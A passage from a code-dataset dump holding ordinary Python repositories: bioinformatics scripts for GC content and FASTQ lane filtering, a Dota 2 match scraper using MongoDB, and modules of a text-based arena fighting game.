"text": "#!/usr/bin/env python\n# coding=utf-8\nfrom collections import Counter\nimport os\nimport argparse\nimport re\n\n\ndef get_arg():\n parser = argparse.ArgumentParser(description=\"%(prog)s 收录一些NGS分析小工具\")\n parser.add_argument('filename', metavar=\"filename\",nargs='+',help='输入(待处理)文件名')\n parser.add_argument('-o','--output', dest=\"output_filename\",help='输出文件名')\n \n args = parser.parse_args()\n print(args)\n return args\n\ndef count_chr_length(args):\n if not args.filename:\n raise IOError(\"No file was assigned!\")\n for file in args.filename:\n if not os.path.exists(file):\n raise IOError(\"{} don't exist in {}\".format(file, os.getcwd()))\n file = args.filename[0]\n chr_length = dict()\n with open(file, \"r\") as f:\n for line in f:\n if \">\" in line:\n chr_name = line.strip()[1:]\n chr_length[chr_name]=0\n else:\n chr_length[chr_name] += len(line)\n \n# print(chr_length)\n output_name = \"chr_length.txt\"\n if args.output_filename:\n output_name = args.output_filename[0]\n out = open(output_name,\"w\")\n for key, value in chr_length.items():\n out.write(\"{} => {}\\n\".format(key,value))\n out.close()\n return chr_length\n\ndef count_GC_content(args):\n file = args.filename[0]\n total_gc = Counter()\n chr_gc = dict()\n with open(file,\"r\") as f:\n for line in f:\n if \">\" in line:\n chr_name=line.strip()[1:]\n chr_gc[chr_name]=Counter()\n else:\n line=line.upper().strip()\n chr_gc[chr_name].update(line)\n total_gc.update(line)\n output_name = \"GC_content.txt\"\n if args.output_filename:\n output_name = args.output_filename[0]\n out = open(output_name,\"w\")\n out.write(\"chromose\\tA\\tT\\tG\\tC\\tpercent\\n\")\n for key, value in chr_gc.items():\n line = \"\"\n print(value)\n for base in 'ATGCN':\n line += \"\\t{}\".format(str(value[base]))\n gc_percent = (value[\"G\"]+value[\"C\"])/(value[\"A\"]+value[\"T\"]+value[\"G\"]+value[\"C\"])\n gc_percent = round(gc_percent*100,2)\n \n out.write(\"{}{}\\t{}\\n\".format(key,line,str(gc_percent)))\n total_gc_percent = round((total_gc[\"G\"] + total_gc[\"C\"])/(total_gc[\"A\"] + total_gc[\"T\"]+total_gc[\"G\"]+ total_gc[\"C\"])*100,2)\n line=\"\"\n for base in \"ATGCN\":\n line += \"\\t{}\".format(total_gc[base])\n out.write(\"total{}\\t{}\\n\".format(line, total_gc_percent))\n out.close()\n print(\"*\"*30)\n print(\"The total GC content:{}%\".format(total_gc_percent))\n print(\"*\"*30)\n\n\n\ndef file_split(args):\n file = args.filename[0]\n\n \n\n\n\n pass\n\n\n\n\n\nargs = get_arg()\n#count_chr_length(args)\ncount_GC_content(args)\n"
},
{
"alpha_fraction": 0.48669296503067017,
"alphanum_fraction": 0.4919911324977875,
"avg_line_length": 34.286956787109375,
"blob_id": "09adf9ec2f287b174f33393836b63c5878d251a1",
"content_id": "88c8940d7e8c653bb055bc89e6993506fbe2dd57",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8810,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 230,
"path": "/python_codes/filter_fy_lane.py",
"repo_name": "fengqing-dong/codes",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding=utf-8\n\n\"\"\"\ntest\n\"\"\"\n\nfrom collections import Counter\nimport re\nimport argparse\nimport os\nimport sys\nimport time\n\n\ndef get_parse():\n parse = argparse.ArgumentParser(description=\"%(prog)s 对fastq文件中lane进行过滤和统计\")\n parse.add_argument(\"file\", help=\"输入文件\")\n parse.add_argument(\"-o\", \"--output\", dest=\"output\", action=\"append\", help=\"输出文件\")\n parse.add_argument(\n \"-l\", \"--lanes\", dest=\"lanes\", action=\"append\", help=\"待过滤的lane/tile编号\"\n )\n parse.add_argument(\n \"-t\", \"--threads\", dest=\"threads\", type=int, default=10, help=\"多进程处理\"\n )\n parse.add_argument(\n \"-s\", \"--site\", dest=\"site\", type=int, default=0, help=\"指定删除节点,在节点之前的序列全部截除\"\n )\n parse.add_argument(\n \"-r\", \"--row\", dest=\"row\", type=int, default=1024 * 1024, help=\"指定输出temp文件中行数\"\n )\n parse.add_argument(\n \"-d\", \"--deleted\", dest=\"deleted\", action=\"store_false\", help=\"删除整个lane/lane\"\n )\n arg = parse.parse_args()\n return arg\n\n\nclass SplitFiles:\n def __init__(self, args):\n self.filename = args.file\n self.output = args.output\n self.threads = args.threads\n self.size = args.row # 拆分后文件的行数\n self.temp_file_list = list() # 拆分后的文件名列表\n if not self.filename:\n raise FileNotFoundError(\"请指定待处理文件!\\n\")\n if not self.output:\n self.output = \"result\" + self.filename\n\n def split_file(self):\n \"\"\"\n 拆分大文件至小文件,可指定拆分个数\n \"\"\"\n if not os.path.exists(self.filename):\n raise FileNotFoundError(\"{}文件不存在,请检查正确路径或者命名!\\n\".format(self.filename))\n with open(self.filename) as f:\n self.lines = sum(1 for _ in f)\n self.split_file_num = self.lines / self.size\n print(\"{}总行数为:{:d}\".format(self.filename, self.lines))\n with open(self.filename) as f:\n store_num = 0\n file_num = 1\n _output_temp_name = \"temp{:03d}\".format(file_num)\n file_temp_output = open(_output_temp_name, \"w\")\n self.temp_file_list.append(_output_temp_name)\n for line in f:\n if store_num < self.size:\n file_temp_output.write(line)\n store_num += 1\n else:\n store_num = 1 # 下方写入一行,所以从1开始计算而不是0\n file_num += 1\n file_temp_output.close()\n _output_temp_name = \"temp{:03d}\".format(file_num)\n file_temp_output = open(_output_temp_name, \"w\")\n file_temp_output.write(line) # 在新闻文件中写入第一行,千万不能漏\n self.temp_file_list.append(_output_temp_name)\n file_temp_output.close()\n print(\"{}文件分割完成,共分割成{}个文件\".format(self.filename, len(self.temp_file_list)))\n return self.temp_file_list\n\n\nclass FileHandle(SplitFiles):\n def __init__(self, args):\n SplitFiles.__init__(self, args)\n if not self.temp_file_list:\n self.temp_file_list = [_ for _ in os.listdir() if \"temp\" in _]\n self.trime_file_list = list()\n self.deleted = args.deleted\n self.site = args.site\n self.lanes = args.lanes\n if not self.lanes:\n raise IndexError(\"请指定待过滤的tile/lane编号!\\n\")\n\n def file_handle_multi(self):\n \"\"\"\n 调度程序,多线程\n \"\"\"\n # TODO 多线程\n for files in self.temp_file_list:\n self.trim_within_file(files)\n self.merge_file()\n # todo function\n\n def trim_within_file(self, files):\n \"\"\"\n 对由SRA转换成FASTQ文件,按照tile编号进行裁减。\n self.deleted 参数控制是否删除整个lane|tile,默认不删除 \n \"\"\"\n print(\"正在裁剪{}\".format(files))\n if not os.path.exists(files):\n raise FileNotFoundError(\"{}文件不存在,请检查正确路径或者命名!\\n\".format(files))\n temp_trim_file = \"trim_{}\".format(files)\n self.trime_file_list.append(temp_trim_file)\n temp_trim_file = open(\"trim_{}\".format(files), \"w\")\n with open(files, \"r\") as f:\n for line in f:\n if line[0] == \"@\" and line.split(\":\")[-3] in self.lanes:\n # TODO 
从尾部、或者两端裁减\n if self.deleted:\n if self.site == 0:\n print(\"并未执行裁减,请根据需要指定-s/--site 参数\")\n temp_trim_file.write(line)\n temp_trim_file.write(\n \" \" * (self.site - 1) + f.__next__()[self.site :]\n ) # Todo 检查site是否超过line长度\n temp_trim_file.write(f.__next__())\n temp_trim_file.write(f.__next__()[self.site :])\n else:\n f.__next__()\n f.__next__()\n f.__next__()\n else:\n temp_trim_file.write(line)\n temp_trim_file.write(f.__next__()) # Todo 检查site是否超过line长度\n temp_trim_file.write(f.__next__())\n temp_trim_file.write(f.__next__())\n temp_trim_file.close()\n os.remove(files)\n\n def merge_file(self):\n \"\"\"\n 合并文件\n \"\"\"\n result = open(\"trim_{}\".format(self.filename), \"w\")\n if not self.trime_file_list:\n self.trime_file_list = [_ for _ in os.listdir() if \"trim\" in _]\n print(\"正在合并文件,共{}文件待合并\".format(len(self.trime_file_list)))\n for _file in self.trime_file_list:\n print(\"正在合并{}\".format(_file))\n with open(_file, \"r\") as f:\n for line in f:\n result.write(line)\n os.remove(_file)\n result.close()\n print(\"文件合并完毕\")\n\n def count_chr_length(self):\n \"\"\"\n 计算每条染色体中ATCG的个数,并计算GC%\n \"\"\"\n file = self.filename\n if not os.path.exists(file):\n raise FileExistsError(\"{} don't exist in {}\".format(file, os.getcwd()))\n chr_length = dict()\n with open(file, \"r\") as f:\n for line in f:\n if \">\" in line:\n chr_name = line.strip()[1:]\n chr_length[chr_name] = 0\n else:\n chr_length[chr_name] += len(line)\n output_name = \"chr_length.txt\"\n out = open(output_name, \"w\")\n for key, value in chr_length.items():\n out.write(\"{} => {}\\n\".format(key, value))\n out.close()\n return chr_length\n\n def count_GC_content(self):\n \"\"\"\n 统计fasta|fastq文件中每个染色体|序列的GC%含量。\n \"\"\"\n total_gc = Counter()\n chr_gc = dict()\n with open(self.filename, \"r\") as f:\n for line in f:\n if \">\" in line:\n chr_name = line.strip()[1:]\n chr_gc[chr_name] = Counter()\n else:\n line = line.upper().strip()\n chr_gc[chr_name].update(line)\n total_gc.update(line)\n output_name = \"GC_content.txt\"\n out = open(output_name, \"w\")\n out.write(\"chromose\\tA\\tT\\tG\\tC\\tN\\tpercent\\n\")\n for key, value in chr_gc.items():\n line = \"\"\n print(value)\n for base in \"ATGCN\":\n line += \"\\t{}\".format(str(value[base]))\n gc_percent = (value[\"G\"] + value[\"C\"]) / (\n value[\"A\"] + value[\"T\"] + value[\"G\"] + value[\"C\"]\n )\n gc_percent = round(gc_percent * 100, 2)\n out.write(\"{}{}\\t{}\\n\".format(key, line, str(gc_percent)))\n total_gc_percent = round(\n (total_gc[\"G\"] + total_gc[\"C\"])\n / (total_gc[\"A\"] + total_gc[\"T\"] + total_gc[\"G\"] + total_gc[\"C\"])\n * 100,\n 2,\n )\n line = \"\"\n for base in \"ATGCN\":\n line += \"\\t{}\".format(total_gc[base])\n out.write(\"total{}\\t{}\\n\".format(line, total_gc_percent))\n out.close()\n print(\"*\" * 30)\n print(\"The total GC content:{}%\".format(total_gc_percent))\n print(\"*\" * 30)\n\n\nif __name__ == \"__main__\":\n args = get_parse()\n ss = FileHandle(args)\n ss.split_file()\n ss.file_handle_multi()\n# ss.merge_file()\n"
}
] | 2 |
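The core of the GC% computation both scripts above share, isolated for clarity; the input sequence is a made-up example:

```python
from collections import Counter

# Counter tallies every base in one pass; N bases are counted but
# excluded from the GC denominator, exactly as in the repo's code.
counts = Counter("ATGCGGCCAATN")
gc = round((counts["G"] + counts["C"]) /
           (counts["A"] + counts["T"] + counts["G"] + counts["C"]) * 100, 2)
print(gc)
```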
ganesshkumar/hollowjack
|
https://github.com/ganesshkumar/hollowjack
|
3d01398b80da1d585ec0b84e9c4b96687141dbe4
|
f3a9e681f4051fd746cb4a616a513576ecfa5f37
|
2b68f36ae418e433bd0195c9f0cb5654b7fbfb0e
|
refs/heads/master
| 2020-12-25T14:13:30.887886 | 2016-07-09T16:50:41 | 2016-07-09T16:50:41 | 62,959,357 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5799151062965393,
"alphanum_fraction": 0.5968882441520691,
"avg_line_length": 24.709091186523438,
"blob_id": "3dd4b4567741e679a15a253f6a29ba39becc99fe",
"content_id": "ee8f34a0ce33ad56e7c7df4e5c4cfb701ea76bd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1414,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 55,
"path": "/test.py",
"repo_name": "ganesshkumar/hollowjack",
"src_encoding": "UTF-8",
"text": "import dota2api\nimport json\nimport time\nimport math\n\nfrom pymongo import MongoClient\n\nclient = MongoClient(\"mongodb://localhost:27017\")\ndb = client[\"hollowjack\"]\napi = dota2api.Initialise()\n\ndef get_league_matches(league_id, loaded_match_ids=[]):\n league_matches_c = db[\"league_matches\"]\n league4664 = api.get_match_history(league_id=league_id)\n\n for match in league4664[\"matches\"]:\n if match[\"match_id\"] in loaded_match_ids:\n continue\n\n league_matches_c.insert_one({\n \"league_id\": league_id,\n \"match_id\": match[\"match_id\"]\n })\n get_match(match[\"match_id\"])\n\ndef get_match(match_id):\n sleep_count = 0\n matches_c = db[\"matches\"]\n while(True):\n try:\n match = api.get_match_details(match_id=match_id)\n match[\"_id\"] = match_id\n matches_c.insert_one(match)\n sleep_count = 0\n break\n except:\n time.sleep(int(math.pow(2, sleep_count)))\n continue\n\n\ndef get_league_match_ids(league_id):\n league_matches_c = db[\"league_matches\"]\n cursor = league_matches_c.find(\n {\"league_id\": league_id},\n {\"league_id\": 0, \"_id\": 0}\n )\n return list(cursor)\n\ndef load_league(league_id):\n loaded_match_ids = get_league_match_ids(league_id)\n get_league_matches(league_id, loaded_match_ids)\n\n\nif __name__ == \"__main__\" :\n load_league(4664)\n"
},
{
"alpha_fraction": 0.4583333432674408,
"alphanum_fraction": 0.6875,
"avg_line_length": 15,
"blob_id": "797ecf8b538c047344a419d420c12a5303f247c0",
"content_id": "00fa980082a2c14de3f3e43af46bdc786c9a222c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "ganesshkumar/hollowjack",
"src_encoding": "UTF-8",
"text": "dota2api==1.3.1\npymongo==3.2.2\nrequests==2.10.0\n"
}
] | 2 |
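The retry-with-exponential-backoff pattern used (after the fix) in `get_match`, pulled out as a generic sketch; `fetch` stands in for the real API call, and the retry cap is an assumption added here:

```python
import time
import math

def with_backoff(fetch, max_tries=6):
    # Try the call, sleeping 2**attempt seconds between failures.
    for attempt in range(max_tries):
        try:
            return fetch()
        except Exception:
            time.sleep(int(math.pow(2, attempt)))
    raise RuntimeError("gave up after {} tries".format(max_tries))
```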
vcable/Arena-Fighter
|
https://github.com/vcable/Arena-Fighter
|
46329b712feafe9391069282acc73d86e8f3058c
|
2ec8c7e00a188eb395fc6273da24fb3c01286763
|
c8dc4c16f690bd09e7009014e9a4a6064633074c
|
refs/heads/master
| 2020-08-21T21:35:46.310837 | 2019-10-25T02:00:01 | 2019-10-25T02:00:01 | 216,251,369 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6043570041656494,
"alphanum_fraction": 0.6177090406417847,
"avg_line_length": 31.976743698120117,
"blob_id": "ab05d6c720acfb29de3a40bc15b48f722c684f3e",
"content_id": "d01316ea6d5eedf8794d9f28986a382b414dbb21",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4269,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 129,
"path": "/enemies.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "# Defines all the enemies that can be encountered in the arena\n# ALL ENEMY METHOD DOCUMENTATION IS IN THE WEAKSWORDSMAN CLASS \n# SINCE ALL THE METHODS ARE THE SAME\n\nimport time\nimport weapons\nimport class_methods\nimport inventory\nfrom termcolor import colored, cprint\n\n\nclass WeakSwordsman:\n\n # Sets name, and basic stats\n def __init__(self, name):\n self.entity_class = colored(\"weak swordsman\", \"red\")\n self.name = colored(name, \"red\")\n self.max_health = 30\n self.current_health = 30\n self.damage_done = 0\n self.alive = True\n self.weapon = weapons.RustyShortsword\n self.strength = 3\n self.dexterity = 1\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 0)\n \n print(f\"\\nA {self.entity_class} named {self.name} appears! He is armed with a {self.weapon.weapon_type}\")\n\n # Attack function is imported from the class_methods module\n attack = class_methods.attack\n\n # take_damage function is imported from the class_methods module\n take_damage = class_methods.take_damage\n \n # Allows AI to consume a potion. They do this automatically if their health is below 20.\n # (the below 20 rule is coded out in main.py in the enemy_turn() method)\n consume_potion = class_methods.enemy_consume_potion\n \nclass Bear:\n \n def __init__(self, name):\n time.sleep(2)\n self.entity_class = colored(\"bear\", \"red\")\n self.name = colored(name, \"red\")\n self.max_health = 50\n self.current_health = 50\n self.damage_done = 0\n self.alive = True\n self.weapon = weapons.Claws\n self.strength = 10\n self.dexterity = 2\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 0)\n \n print(f\"\\nA {self.entity_class} named {self.name} appears! It's claws look terribly sharp...\")\n \n attack = class_methods.attack\n \n take_damage = class_methods.take_damage\n \n consume_potion = class_methods.enemy_consume_potion\n \nclass SeasonedGladiator:\n \n def __init__(self, name):\n time.sleep(2)\n self.entity_class = colored(\"seasoned gladiator\", \"red\")\n self.name = colored(name, \"red\")\n self.max_health = 60\n self.current_health = 60\n self.damage_done = 0\n self.alive = True\n self.weapon = weapons.Morningstar\n self.strength = 12\n self.dexterity = 5\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 0)\n \n print(f\"\\nA {self.entity_class} named {self.name} appears! He swings his morningstar menacingly...\")\n \n attack = class_methods.attack\n \n take_damage = class_methods.take_damage\n \n consume_potion = class_methods.enemy_consume_potion\n \nclass Basilisk:\n \n def __init__(self, name):\n time.sleep(2)\n self.entity_class = colored(\"basilisk\", \"red\")\n self.name = colored(name, \"red\")\n self.max_health = 60\n self.current_health = 60\n self.damage_done = 0\n self.alive = True\n self.weapon = weapons.Fangs\n self.strength = 8\n self.dexterity = 10\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 0)\n \n print(f\"\\nA {self.entity_class} named {self.name} appears! 
His fangs drip with poison...\")\n \n attack = class_methods.attack\n \n take_damage = class_methods.take_damage\n \n consume_potion = class_methods.enemy_consume_potion\n \nclass SmallDragon:\n \n def __init__(self, name):\n time.sleep(2)\n self.entity_class = colored(\"small dragon\", \"red\")\n self.name = colored(name, \"red\")\n self.max_health = 70\n self.current_health = 70\n self.damage_done = 0\n self.alive = True\n self.weapon = weapons.Firebreath\n self.strength = 12\n self.dexterity = 4\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 2, 0)\n \n print(f\"\\nA {self.entity_class} named {self.name} appears! His eyes glow like embers...\")\n \n attack = class_methods.attack\n \n take_damage = class_methods.take_damage\n \n consume_potion = class_methods.enemy_consume_potion\n\n \n\n "
},
{
"alpha_fraction": 0.5306987762451172,
"alphanum_fraction": 0.5367154479026794,
"avg_line_length": 43.327274322509766,
"blob_id": "89b271f578009ddf2a084e4940393cefc7b3c3ca",
"content_id": "cd838cd9596a29e34156b58d1481b817d07f216f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7313,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 165,
"path": "/class_methods.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "import potions_and_items\nimport time\nimport inventory\nfrom termcolor import colored, cprint\nimport weapons\nimport random\nimport spells\n\n# This module defines common class methods, such as attack and deal damage\n\n# Attacks a given target. Damage is dependent on weapon used\ndef attack(self, target):\n if self.alive == False:\n pass\n else:\n print(f\"\\n{self.name} attacks {target}!\")\n time.sleep(2)\n self.damage_done = self.weapon.damage\n print(f\"\\n{self.name} does {self.damage_done} damage with his {self.weapon.weapon_type}\")\n\n# Takes damage (subtracts taken damage from max_health) and check for death\ndef take_damage(self, damage):\n self.current_health -= damage \n print(f\"\\n{self.name} took {damage} damage! Total health is now {self.current_health}/{self.max_health}\")\n if self.current_health <= 0:\n print(f\"\\n{self.name} is dead.\")\n self.alive = False\n \n \n# Player death message and program exit\ndef player_death(self):\n if self.alive == False:\n print(\"You have fought valiantly in the arena, but unfortunately you have suffered defeat.\")\n exit()\n \n# Allows user to consume a potion\ndef player_consume_potion(self):\n print(f\"\\nWhich potion would you like to use? Look at your inventory, and select one! (enter 'health potion'/'mana potion')\")\n self.inventory.print_inventory()\n p_input = input(\"\\n> \")\n \n if p_input == \"health potion\" and self.inventory.health_potion > 0 and self.current_health < self.max_health:\n self.current_health += 10\n self.inventory.health_potion -= 1\n print(f\"\\n{self.name} uses a health potion.\")\n time.sleep(2)\n print(f\"\\n{self.name}'s current health is now {self.current_health}/{self.max_health}\")\n \n elif p_input == \"mana potion\" and self.inventory.mana_potion > 0 and self.current_mana < self.max_mana:\n print(f\"\\n{self.name} uses a mana potion.\")\n self.current_mana += 10\n self.inventory.mana_potion -= 1\n time.sleep(2)\n print(f\"\\n{self.name}'s current mana is now {self.current_mana}/{self.max_mana}\")\n \n else:\n time.sleep(2)\n print(\"\\nEither you can't use that particular potion, your health/mana points are full, or you entered some invalid input. Try again!\")\n self.consume_potion()\n \n# Consume potion method for AI. I made 2 different methods because the AI has to decide independently when to use a potion\n# and what potion to use, whereas the player decides differently\n# Note: Enemies currently do not have mana, so they will only be able to consume health potions\ndef enemy_consume_potion(self):\n if self.current_health < self.max_health / 2 and self.inventory.health_potion > 0:\n time.sleep(2)\n self.current_health += 10\n self.inventory.health_potion -= 1\n print(f\"\\n{self.name} uses a health potion and recovers 10 health points. Current health is {self.current_health}/{self.max_health}\")\n else:\n pass\n \n# Resets players stats (health/mana) before every encounter and grants potions\ndef reset_stats(self):\n hp = colored(\"2\", \"yellow\")\n mp = colored(\"1\", \"yellow\")\n try:\n self.current_mana = self.max_mana\n time.sleep(2)\n print(f\"\\n{self.name}'s mana points have been reset. They are now at {self.current_mana}/{self.max_mana}\")\n except:\n pass\n \n self.current_health = self.max_health\n time.sleep(2)\n print(f\"\\n{self.name}'s health points have been reset. 
They are now at {self.current_health}/{self.max_health}\")\n \n if self.class_name == \"Fighter\" or self.class_name == \"Hunter\":\n self.inventory.health_potion += 2\n time.sleep(2)\n print(\"\\nYou have been granted \" + hp + \" health potions.\")\n elif self.class_name == \"Mage\":\n self.inventory.mana_potion += 1\n self.inventory.health_potion += 2\n time.sleep(2)\n print(\"\\nYou have been granted \" + mp + \" mana potion and \" + hp + \" health potions.\") \n \n# This function handles the loot system\ndef loot(self):\n \n if self.class_name == \"Fighter\":\n # Items that can drop\n items = [potions_and_items.HealthPotion.name, \n weapons.Longsword.weapon_type, \n weapons.RustyShortsword.weapon_type, \n weapons.Morningstar.weapon_type]\n\n loot = random.choice(items)\n \n if loot == potions_and_items.HealthPotion.name:\n self.inventory.health_potion += 1\n time.sleep(2)\n print(\"\\nYou loot a health potion.\")\n else:\n self.inventory.weapons.append(loot)\n time.sleep(2)\n print(\"\\nYou loot a \" + loot)\n \n elif self.class_name == \"Mage\":\n \n items = [potions_and_items.HealthPotion.name,\n potions_and_items.ManaPotion.name,\n spells.LightningBolt.spell_name,\n spells.Stun.spell_name]\n \n loot = random.choice(items)\n \n if loot == potions_and_items.HealthPotion.name:\n self.inventory.health_potion += 1\n time.sleep(2)\n print(\"\\nYou loot a health potion.\")\n elif loot == potions_and_items.ManaPotion.name:\n self.inventory.mana_potion += 1\n time.sleep(2)\n print(\"\\nYou loot a mana potion.\")\n else:\n self.spell_list.append(colored(loot, \"yellow\"))\n self.mana_costs.append(\"(10 mana)\")\n time.sleep(2)\n print(\"\\nYou loot a \" + loot + \" scroll.\")\n \n elif self.class_name == \"Hunter\":\n \n items = [potions_and_items.HealthPotion.name,\n weapons.Crossbow.weapon_type,\n potions_and_items.HealthPotion.name,\n weapons.Slingshot.weapon_type]\n \n loot = random.choice(items)\n \n if loot == potions_and_items.HealthPotion.name:\n self.inventory.health_potion += 1\n time.sleep(2)\n print(\"\\nYou loot a health potion.\")\n else:\n self.inventory.weapons.append(loot)\n time.sleep(2)\n print(\"\\nYou loot a \" + loot) \n\n# Equips weapons from inventory\n#def equip(self):\n #print(\"Enter the name of the weapon you would like to equip.\")\n #p_input = input(\"> \")\n #if p_input in self.weapons:\n #self.weapon = p_"
},
{
"alpha_fraction": 0.5625,
"alphanum_fraction": 0.5668604373931885,
"avg_line_length": 32.37313461303711,
"blob_id": "d5c24c99b4ba5c125171901657701d50070088f0",
"content_id": "7609041b21f43510a9aa30a4a3db2b6ebefbc09a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8944,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 268,
"path": "/main.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "# Sets up battles in the arena\n\nimport classes\nimport enemies\nfrom termcolor import colored, cprint\nimport time\nfrom os import system, name\n\n# Clears screen before game start\ndef clear():\n \n # for windows\n if name == 'nt':\n _ = system('cls')\n \n # for mac and linux\n else:\n _ = system('clear')\n\n# Keeps track of player character\n# This class has a dynamically created variable called player_character that is\n# created when the player goes through the character creation process.\n# This variable ties directly to the picked class\n\n\nclass PlayerCharacter:\n\n def __init__(self):\n return\n\n\n# Keeps track of current enemy\n# This class contains a dynamically created variable that is \n# changed depending on the encounter. It is tied directly to\n# the enemy class \nclass CurrentEnemy:\n \n def __init__(self):\n return\n\n# Takes care of combat loop\nclass Combat:\n \n # Combat loop w/ turns\n def combat_loop(self):\n while CurrentEnemy.current_enemy.alive == True:\n self.enemy_turn()\n self.player_turn()\n \n # Player turn\n def player_turn(self):\n \n if PlayerCharacter.player_character.class_name == \"Mage\":\n print(\"\\nYou can attack, use a potion, view your spells, or view your inventory. Enter 'attack', 'potion', 'spells', or 'inventory'.\")\n player_input = input(\"> \")\n else:\n print(\"\\nYou can attack, use a potion, or view your inventory. Enter 'attack', 'potion', or 'inventory'.\")\n player_input = input(\"> \")\n \n if player_input.lower().strip(\"\\n\") == \"attack\":\n PlayerCharacter.player_character.attack(CurrentEnemy.current_enemy.name)\n time.sleep(2)\n CurrentEnemy.current_enemy.take_damage(PlayerCharacter.player_character.damage_done)\n time.sleep(2)\n \n elif player_input.lower().strip(\"\\n\") == \"potion\":\n time.sleep(2)\n PlayerCharacter.player_character.consume_potion()\n \n elif player_input.lower().strip(\"\\n\") == \"inventory\":\n PlayerCharacter.player_character.inventory.print_inventory()\n self.player_turn()\n \n elif player_input.lower().strip(\"\\n\") == \"spells\" and PlayerCharacter.player_character.class_name == \"Mage\":\n PlayerCharacter.player_character.list_spells()\n self.player_turn()\n \n else:\n time.sleep(2)\n print(\"\\nInvalid input, please try again.\")\n self.player_turn()\n \n \n \n # Enemy turn\n def enemy_turn(self):\n print(f\"\\nIt is {CurrentEnemy.current_enemy.name}'s turn.\")\n CurrentEnemy.current_enemy.consume_potion()\n time.sleep(2) \n CurrentEnemy.current_enemy.attack(PlayerCharacter.player_character.name)\n time.sleep(2)\n PlayerCharacter.player_character.take_damage(CurrentEnemy.current_enemy.damage_done)\n time.sleep(2)\n \n # Check death condition\n PlayerCharacter.player_character.player_death()\n \n\n# Initializes encounters with different enemies\nclass Encounters:\n \n # Handles the Weak Swordsman encounter\n def w_sword_encounter(self):\n CurrentEnemy.current_enemy = enemies.WeakSwordsman(\"Glorb\")\n time.sleep(2)\n combat = Combat()\n combat.combat_loop()\n print(f\"\\nYou have defeated the Weak Swordsman {CurrentEnemy.current_enemy.name}! 
You have tasted victory, but don't expect the rest of the fights to be this easy...\")\n time.sleep(2)\n PlayerCharacter.player_character.loot()\n \n # Bear encounter \n def bear_encounter(self):\n time.sleep(2)\n CurrentEnemy.current_enemy = enemies.Bear(\"Rusty\")\n combat = Combat()\n combat.combat_loop()\n print(f\"\\nYou have defeated the bear {CurrentEnemy.current_enemy.name}, yet there are many battles that lie ahead...\")\n time.sleep(2)\n PlayerCharacter.player_character.loot()\n \n def seasoned_g_encounter(self):\n time.sleep(2)\n CurrentEnemy.current_enemy = enemies.SeasonedGladiator(\"Olaf\")\n combat = Combat()\n combat.combat_loop()\n print(f\"\\nYou have defeated the seasoned gladiator {CurrentEnemy.current_enemy.name}, but there are still many battles on the horizon...\")\n time.sleep(2)\n PlayerCharacter.player_character.loot()\n \n def basilisk_encounter(self):\n time.sleep(2)\n CurrentEnemy.current_enemy = enemies.Basilisk(\"Ronny\")\n combat = Combat()\n combat.combat_loop()\n print(f\"\\nYou have defeated the hissing basilisk Ronny, but there are more encounters ahead...\")\n time.sleep(2)\n PlayerCharacter.player_character.loot()\n \n def dragon_encounter(self):\n time.sleep(2)\n CurrentEnemy.current_enemy = enemies.SmallDragon(\"Drogon\")\n combat = Combat()\n combat.combat_loop()\n print(f\"\\nYou have defeated the small dragon Drogon, and quelled the fire in his lungs.\")\n time.sleep(2)\n cprint(\"\\nYou are the champion of the arena!\", \"red\")\n exit(0)\n \n\nclass Game:\n\n def __init__(self):\n\n # clear screen\n clear()\n \n # Introductory message\n \n cprint( \n \"\"\"\n _________________________________________\n \n WELCOME TO\n \n ARENA FIGHTER\n _________________________________________\"\"\", \"red\")\n \n # Create player character\n time.sleep(2)\n self.create_pc()\n \n # Start first encounter\n self.encounter_1()\n \n # Second encounter, etc\n self.encounter_2()\n \n self.encounter_3()\n \n self.encounter_4()\n \n self.encounter_5()\n\n # Handles creation of player character\n def create_pc(self):\n\n print(\"\\nPlease select your class: Fighter, Mage, or Hunter\")\n\n class_selection = input(\"> \")\n\n if class_selection.lower().strip(\"\\n\") == \"fighter\":\n\n print(\"Pick a name for your fighter!\")\n fighter_name = input(\"> \")\n PlayerCharacter.player_character = classes.Fighter(fighter_name)\n time.sleep(2)\n\n elif class_selection.lower().strip(\"\\n\") == \"mage\":\n\n print(\"Pick a name for your mage!\")\n mage_name = input(\"> \")\n PlayerCharacter.player_character = classes.Mage(mage_name)\n time.sleep(2)\n\n elif class_selection.lower().strip(\"\\n\") == \"hunter\":\n\n print(\"Pick a name for your hunter!\")\n hunter_name = input(\"> \")\n PlayerCharacter.player_character = classes.Hunter(hunter_name)\n time.sleep(2)\n \n else:\n \n print(\"That is not a valid class, please try again.\")\n time.sleep(2)\n self.create_pc()\n \n def encounter_1(self):\n \n # Makes encounters available\n arena = Encounters()\n \n # Starts first encounter\n cprint(\"\\nWelcome to the arena, warrior!\", \"red\")\n time.sleep(2.5)\n arena.w_sword_encounter()\n \n def encounter_2(self):\n \n PlayerCharacter.player_character.reset_stats()\n \n # Same exact functionality as encounter_1\n arena = Encounters()\n print(\"\\nHaving dealt with the Weak Swordsman, you wipe his blood from your 